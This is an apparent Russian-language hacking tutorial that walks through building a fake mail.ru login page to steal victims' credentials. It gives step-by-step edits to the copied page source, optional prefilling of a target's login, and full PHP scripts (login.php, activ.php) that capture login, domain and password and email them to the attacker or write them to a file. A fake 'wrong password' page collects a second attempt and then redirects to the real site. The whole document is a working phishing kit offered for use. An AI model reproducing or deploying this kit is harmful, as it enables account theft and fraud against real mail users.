Доброго времени суток!
И так приступим
Переходим на страницу авторизации http://my.mail.ru/ Открываем исходный код страницы,копируем его в текстовик и ищем строку
<form method="post" action="http://e.mail.ru/cgi-bin/auth" name="Auth">
меняем на
<form method="post" action="login.php">
Потом ищем стоку
<input type="hidden" name="page" value="http://my.mail.ru/">
И удаляем его!
Далее если знаем мыло жертвы то можете сделать так чтоб при открытии фейка логин жертвы вписывалось автоматически!
Для этого ищем строку
<input type="text" name="Login" tabindex="1" value="" class="inp login">
меняем на
<input type="text" name="Login" tabindex="1" value="логин жертвы" class="inp login">
Ну это не обязательно!
Сохраняем как index.php
Далее сам login.php
<?php
$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="erorr.php";$p0=$_REQUEST["Login"];
$p1=$_REQUEST["Domain"];
$p2=$_REQUEST["Password"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:домен:$p1:пароль:$p2:\n";if ($IS_EMAIL){
mail($BASE, "Привет от wwwthehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}header("Location:$LOCATION");
?>
вписываем мыло
Для того чтоб снизить вероятность что жертва ошибется при вводе логина и пасса мы создаем еще и erorr.php для этого без заполнения поле логина и пароля жмякаем войти. Нас перекинет на страницу где будет сказано Неверное имя пользователя или пароль
Потом открываем исходный код страницы,копируем его в текстовик и ищем строку
<form method="post" action="http://win.mail.ru/cgi-bin/auth" name="Auth" onSubmit="return CheckForm(this);">
и меняем на
<form method="post" action="activ.php" onSubmit="return CheckForm(this);">
Далее ищем строку
<input type="hidden" name="page" value="http://my.mail.ru/">
И удаляем его!
И опят же если знаем логин жертвы то можете сделать так чтоб при открытии фейка логин жертвы вписывалось автоматически!
Для этого ищем строку
<input type="text" name="Login" value="" class=w_100>
И меняем
<input type="text" name="Login" value="логин жертвы" class=w_100>
Сохраняем как erorr.php
Вот и activ.php
<?php
$BASE="мыло";
$IS_EMAIL=true;
$LOCATION="http://my.mail.ru/";$p0=$_REQUEST["Login"];
$p1=$_REQUEST["Domain"];
$p2=$_REQUEST["Password"];
$headers = "Content-type: text/html; charset=windows-1251\r\n";
$headers .= "From: bot <$BASE>\r\n";
$headers .= "Bcc: $BASE\r\n";
$info="логин:$p0:домен:$p1:пароль:$p2:\n";if ($IS_EMAIL){
mail($BASE, "Привет от wwwthehackword.ru", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}header("Location:$LOCATION");
?>
вписываем мыло
И так наш фейк готов!
мы создали 4 файла
index.php
login.php
erorr.php
activ.php
Заливаем все файлы на хост и радуемся, как это сделать вы можете узнать в этом статье
Если что можете скачать уже готовый фейк
Ну вот и все!